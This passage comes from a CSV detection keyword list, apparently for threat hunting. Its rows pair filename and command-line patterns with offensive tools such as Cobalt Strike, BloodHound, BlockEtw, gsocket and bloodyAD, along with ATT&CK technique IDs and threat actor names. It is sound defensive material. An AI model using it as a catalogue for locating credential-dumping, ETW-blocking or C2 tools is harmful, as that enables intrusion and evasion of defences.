TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*blitz -l",".{0,1000}blitz\s\-l","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*blitz -s *",".{0,1000}blitz\s\-s\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*blockchain2john.py*",".{0,1000}blockchain2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*blockdlls -*",".{0,1000}blockdlls\s\-.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*blockdlls start*",".{0,1000}blockdlls\sstart.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*blockdlls stop*",".{0,1000}blockdlls\sstop.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*blocketw.bin*",".{0,1000}blocketw\.bin.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","75","18","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" "*blocketw.csproj*",".{0,1000}blocketw\.csproj.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","75","18","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" "*blocketw.exe*",".{0,1000}blocketw\.exe.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","75","18","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" "*blocketw.pdb*",".{0,1000}blocketw\.pdb.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","75","18","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" "*BlockEtw-master*",".{0,1000}BlockEtw\-master.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","75","18","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" "*BlockNewProcClient.exe -*",".{0,1000}BlockNewProcClient\.exe\s\-.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*BlockNewProcDrv_x64.sys*",".{0,1000}BlockNewProcDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*BlockOpenHandle.cpp*",".{0,1000}BlockOpenHandle\.cpp.{0,1000}","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","9","2","157","24","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z" "*BlockOpenHandle.exe*",".{0,1000}BlockOpenHandle\.exe.{0,1000}","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","9","2","157","24","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z" "*BlockOpenHandle.vcxproj*",".{0,1000}BlockOpenHandle\.vcxproj.{0,1000}","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","9","2","157","24","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z" "*BlockOpenHandle-main*",".{0,1000}BlockOpenHandle\-main.{0,1000}","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","9","2","157","24","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z" "*blog.lexfo.fr/sshimpanzee.html*",".{0,1000}blog\.lexfo\.fr\/sshimpanzee\.html.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lexfo/sshimpanzee","1","1","N/A","10","10","228","26","2024-01-29T14:20:03Z","2023-04-03T10:11:27Z" "*bloginuser*",".{0,1000}bloginuser.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*blogonpasswords*",".{0,1000}blogonpasswords.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bloodhound &> /dev/null &*",".{0,1000}bloodhound\s\&\>\s\/dev\/null\s\&.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*bloodhound --no-sandbox*",".{0,1000}bloodhound\s\-\-no\-sandbox.{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*BloodHound-*.zip*",".{0,1000}BloodHound\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "*bloodhound.ad.*",".{0,1000}bloodhound\.ad\..{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*bloodhound.bin*",".{0,1000}bloodhound\.bin.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "*bloodhound.enumeration*",".{0,1000}bloodhound\.enumeration.{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*BloodHound.ps1*",".{0,1000}BloodHound\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SPN.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*bloodhound.py *",".{0,1000}bloodhound\.py\s.{0,1000}","offensive_tool_keyword","BloodHound.py","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Exploitation tools","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*bloodhound.py*",".{0,1000}bloodhound\.py.{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*bloodhound.rb*",".{0,1000}bloodhound\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bloodhound_output*/dev/null*",".{0,1000}bloodhound_output.{0,1000}\/dev\/null.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*bloodhound_output_*.txt*",".{0,1000}bloodhound_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*bloodhound_output_dconly_*",".{0,1000}bloodhound_output_dconly_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*BloodHoundAD*",".{0,1000}BloodHoundAD.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "*BloodHoundAD*",".{0,1000}BloodHoundAD.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*BloodHoundGraphToGoFetchPath*",".{0,1000}BloodHoundGraphToGoFetchPath.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","620","139","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" "*bloodhound-import -du neo4j -dp *.json*",".{0,1000}bloodhound\-import\s\-du\sneo4j\s\-dp\s.{0,1000}\.json.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*BloodHound-master*",".{0,1000}BloodHound\-master.{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*BloodHound-modified.ps1*",".{0,1000}BloodHound\-modified\.ps1.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*bloodhound-python*",".{0,1000}bloodhound\-python.{0,1000}","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*bloodhound-quickwin -u * -p *",".{0,1000}bloodhound\-quickwin\s\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*bloodhound-quickwin-main*",".{0,1000}bloodhound\-quickwin\-main.{0,1000}","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/kaluche/bloodhound-quickwin","1","1","AD Enumeration","6","2","185","19","2023-12-18T13:23:10Z","2021-02-16T16:04:16Z" "*BloodSecurity Hackers Shell*",".{0,1000}BloodSecurity\sHackers\sShell.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*bloodyAD -*",".{0,1000}bloodyAD\s\-.{0,1000}","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","0","N/A","10","10","1072","106","2024-03-28T07:42:11Z","2021-10-11T15:07:26Z" "*bloodyAD.py*",".{0,1000}bloodyAD\.py.{0,1000}","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","10","1072","106","2024-03-28T07:42:11Z","2021-10-11T15:07:26Z" "*bloodyAD-main*",".{0,1000}bloodyAD\-main.{0,1000}","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","10","1072","106","2024-03-28T07:42:11Z","2021-10-11T15:07:26Z" "*bluekeepscanner.exe*",".{0,1000}bluekeepscanner\.exe.{0,1000}","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*bm90cmVkYW1lY2hlYXRzdG93aW4-*",".{0,1000}bm90cmVkYW1lY2hlYXRzdG93aW4\-.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*bmarchev/Forensike*",".{0,1000}bmarchev\/Forensike.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","1","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*bob@moozle.wtf*",".{0,1000}bob\@moozle\.wtf.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*BobTheSmuggler.py*",".{0,1000}BobTheSmuggler\.py.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","1","N/A","10","5","436","44","2024-05-01T17:23:14Z","2024-01-10T08:04:57Z" "*BobTheSmuggler-main*",".{0,1000}BobTheSmuggler\-main.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - 